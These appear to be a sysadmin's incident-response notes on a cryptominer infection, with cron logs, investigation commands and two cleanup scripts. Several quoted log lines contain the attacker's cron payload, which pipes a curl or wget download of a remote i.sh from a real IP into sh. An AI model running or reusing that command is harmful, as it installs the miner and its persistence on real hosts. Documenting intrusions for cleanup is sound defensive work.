记录一次真实的挖矿 入侵排查分析
https://cloud.tencent.com/developer/article/1461835
木马程序运行过程
https://www.cnblogs.com/diantong/p/11407526.html
/usr/bin/gbycfa4
-rwxr-xr-x 1 root root 4268416 9月 24 09:35 /usr/bin/gbycfa4
9月24号开启计划任务
Sep 24 09:30:01 harbor197 CROND[28911]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh)
Sep 24 08:13:01 jumperserver130 crond[1249]: (crontabs) ORPHAN (no passwd entry)
Sep 24 08:15:01 jumperserver130 CROND[13230]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh)
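# Confirm the cron job on a host: first 4 matching lines from the rotated cron log.
# grep reads the file directly (no cat pipe); `--` keeps the pattern from being
# parsed as an option.
grep -- "/usr/bin/gbycfa4" /var/log/cron-20190929 | head -n4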
java-linux136 | CHANGED | rc=0 >>
sep 24 08:00:01 deyi136 CROND[26478]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh)
st-138 | CHANGED | rc=0 >>
Sep 24 08:00:01 st138 CROND[24252]: (root) CMD ((/usr/bin/gbycfa4||/usr/libexec/gbycfa4||/usr/local/bin/gbycfa4||/tmp/gbycfa4||curl -m180 -fsSL http://103.219.
# Persistence check on a suspect host: list root's crontab, open it for
# editing, then show which SSH public keys can log in as root.
crontab -l
crontab -e
cat < /root/.ssh/authorized_keys
[root@harbor197 ~]# ll /root/.ssh/authorized_keys
-rw-r--r-- 1 root root 396 9月 24 09:30 /root/.ssh/authorized_keys
/usr/bin/gbycfa4 /usr/libexec/gbycfa4 /usr/local/bin/gbycfa4 /tmp/gbycfa4
192.168.1.161
192.168.1.190
192.168.1.191
192.168.1.192
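# Edit root's crontab; the file being edited lives under /var/spool/cron/.
# A space is required before `#` — the original `crontab -e#...` hands the
# whole string "-e#..." to crontab as one option instead of a comment.
crontab -e  # edited file: /var/spool/cron/<user>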
[root@harbor197 ~]# ll /var/spool/cron/root
-rw------- 1 root root 198 9月 24 17:30 /var/spool/cron/root
[root@harbor197 ~]# ll /var/spool/cron/crontabs/root
-rw-r--r-- 1 root root 199 9月 24 17:29 /var/spool/cron/crontabs/root
# Crontab files modified within the last 23 days (the window that reached the
# Sep 24 drop when these notes were taken; adjust it to the current date).
find /var/spool/cron/ -mtime -23 -print
可能注意的文件
/tmp/crontab.*
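# Two separate searches. The original put both on one line, which makes a
# single find treat "find" and the second path as extra starting points.
find /usr/ -mtime -30                          # anything under /usr changed in the last 30 days
find /var/spool/cron/ -mtime -23 -mtime +21    # crontabs changed 21-23 days ago (the Sep 24 window at note time)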
注意的文件
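# Artefacts to inspect on each host. One ls call: `ll` is an interactive alias,
# and the original ran it once with every path and the literal word "ll" as
# arguments, so it would report "ll: No such file" instead of listing them.
ls -l -- /root/.ssh/authorized_keys /usr/bin/gbycfa4 /var/spool/cron/root \
  /var/spool/cron/crontabs/root /tmp/Jonason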
/etc/rc.local
/etc/rc.d/rc.local
/etc/init.d/
# psmisc provides pstree; use it to see what parents the unknown process
# (a process hanging directly off systemd points at a unit or rc script, not cron).
yum install -y psmisc
pstree
systemd─┬─Jonason───5*[{Jonason}]
/usr/lib/systemd/system/ #这个目录存储每个服务的启动脚本,类似于之前的/etc/init.d/
/run/systemd/system/ #系统执行过程中所产生的服务脚本,比上面目录优先运行
/etc/systemd/system/
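#!/usr/bin/env bash
# Production miner cleanup, run 1. Requires root.
# Order matters: the cron entry falls back to curl/wget of i.sh when the local
# binaries are missing, so the crontabs go first, then the processes, then the
# binaries. Set NEW_ROOT_PASSWORD in the environment — the original reset every
# host to the same fixed password, which is itself a finding.
set -uo pipefail   # no -e: each step is best-effort and reports its own failure

: "${NEW_ROOT_PASSWORD:?export NEW_ROOT_PASSWORD before running}"
# Constructed default; override with EVIDENCE_DIR. Copies kept for the post-mortem.
evidence_dir=${EVIDENCE_DIR:-$(mktemp -d /root/ir-evidence.XXXXXX)} || exit 1

# 1. Preserve what is about to be destroyed.
for f in /var/spool/cron/root /var/spool/cron/crontabs/root \
         /root/.ssh/authorized_keys /usr/bin/gbycfa4 /tmp/Jonason /etc/hosts; do
  [[ -e "$f" ]] && cp -a -- "$f" "$evidence_dir/${f//\//_}"
done

# 2. Persistence: the root crontabs that relaunch gbycfa4 every 15 minutes.
rm -f -- /var/spool/cron/root /var/spool/cron/crontabs/root
# NOTE(review): pstree showed Jonason parented by systemd, which a crontab alone
# does not explain — also check /etc/crontab, /etc/cron.d/ and the systemd unit dirs.

# 3. The attacker's key. As in the original this empties the whole file, which
# also drops legitimate keys; restore known-good ones from the evidence copy.
: > /root/.ssh/authorized_keys

# 4. Running payloads. pgrep instead of ps|grep|grep -v grep, and no kill on an
# empty PID list (the original `&& kill -9 $pid` always ran, pid or not).
for name in gbycfa4 Jonason; do
  mapfile -t pids < <(pgrep -f "$name")
  if (( ${#pids[@]} )); then
    kill -9 "${pids[@]}" || printf 'kill failed for %s\n' "$name" >&2
  else
    printf 'no running %s process\n' "$name" >&2
  fi
done

# 5. Dropped binaries.
rm -f -- /tmp/Jonason /usr/bin/gbycfa4

# 6. Rotate root's password (crontab + key under root imply root was compromised).
printf '%s\n' "$NEW_ROOT_PASSWORD" | passwd --stdin root || printf 'passwd failed\n' >&2

# 7. /etc/hosts: the original blindly deletes lines 4-33. That range is specific
# to this fleet's baseline file — review the evidence copy before relying on it.
sed -i '4,33d' /etc/hosts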
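#!/usr/bin/env bash
# 生产环境木马清理2 — production miner cleanup, run 2 (hosts where the second
# payload was named Trump). Requires root; the original's lone `sudo` is dropped
# because every other step already needs root.
# Crontabs are removed before the binaries so the curl/wget fallback in the cron
# line cannot re-fetch i.sh. NEW_ROOT_PASSWORD must come from the environment —
# the original hard-coded one password for the whole fleet.
set -uo pipefail   # no -e: best-effort steps, each reports its own failure

: "${NEW_ROOT_PASSWORD:?export NEW_ROOT_PASSWORD before running}"
# Constructed default; override with EVIDENCE_DIR.
evidence_dir=${EVIDENCE_DIR:-$(mktemp -d /root/ir-evidence.XXXXXX)} || exit 1

artefacts=(/var/spool/cron/root /var/spool/cron/crontabs/root
           /root/.ssh/authorized_keys /usr/bin/gbycfa4 /tmp/Jonason /tmp/Trump
           /etc/hosts)
for f in "${artefacts[@]}"; do
  [[ -e "$f" ]] && cp -a -- "$f" "$evidence_dir/${f//\//_}"
done

rm -f -- /var/spool/cron/root /var/spool/cron/crontabs/root

# Assumes the attacker's key is line 1 of authorized_keys (the 396-byte file seen
# on harbor197 is consistent with a single key) — verify on each host first.
sed -i '1d' /root/.ssh/authorized_keys

# Kill only when something matched; the original ran kill -9 with an empty $pid.
for name in gbycfa4 Trump; do
  mapfile -t pids < <(pgrep -f "$name")
  if (( ${#pids[@]} )); then
    kill -9 "${pids[@]}" || printf 'kill failed for %s\n' "$name" >&2
  else
    printf 'no running %s process\n' "$name" >&2
  fi
done

rm -f -- /tmp/Jonason /usr/bin/gbycfa4 /tmp/Trump

printf '%s\n' "$NEW_ROOT_PASSWORD" | passwd --stdin root || printf 'passwd failed\n' >&2

# Lines 4-33 are the fleet-specific range the attacker appended to on these
# hosts; check the evidence copy before applying this elsewhere.
sed -i '4,33d' /etc/hosts
cat /etc/hosts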
测试端口查看
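# Dry run of the kill step: print the PIDs that would be killed, without killing.
# The original `grep grep Jonason` was a typo — it searched a file named Jonason
# for the word "grep" — so it never printed a PID. pgrep -f matches the full
# command line, as the ps|grep chain did.
pids=$(pgrep -f Jonason) && printf '%s\n' "$pids"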
198
197
114
194
195
214
158未被入侵只是修改密码
170
112只修改密码 未被入侵
137
138
139
130
199
注意文件
/etc/passwd 用户信息文件
/etc/shadow 用户密码文件
/etc/hosts
/bin /sbin root命令
/usr/bin 普通用户使用的应用程序
/usr/sbin 管理员使用的应用程序
参考
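#!/usr/bin/env bash
# Reference: delete the last N lines of a file in place.
# Usage as a snippet: myfile=<path> num=<count>; both default to the original
# example values (a.txt, 3).

#######################################
# Remove the last `count` lines of `file` in place.
# Arguments: $1 - file to edit, $2 - number of trailing lines to drop
# Returns:   0 on success; 1 if the file is unreadable or count is not a number
#######################################
trim_tail() {
  local file=$1 count=$2
  local total start
  [[ -r "$file" ]] || { printf 'trim_tail: cannot read %s\n' "$file" >&2; return 1; }
  [[ "$count" =~ ^[0-9]+$ ]] || { printf 'trim_tail: bad count %s\n' "$count" >&2; return 1; }
  total=$(sed -n '$=' -- "$file")   # line count, same method as the original
  total=${total:-0}                 # sed prints nothing for an empty file
  (( count == 0 || total == 0 )) && return 0
  start=$(( total - count + 1 ))    # first line to delete
  (( start < 1 )) && start=1        # original produced address 0 here, which sed rejects
  sed -i "${start},\$d" -- "$file"
}

myfile=${myfile:-a.txt}
num=${num:-3}   # number of trailing lines to delete
trim_tail "$myfile" "$num"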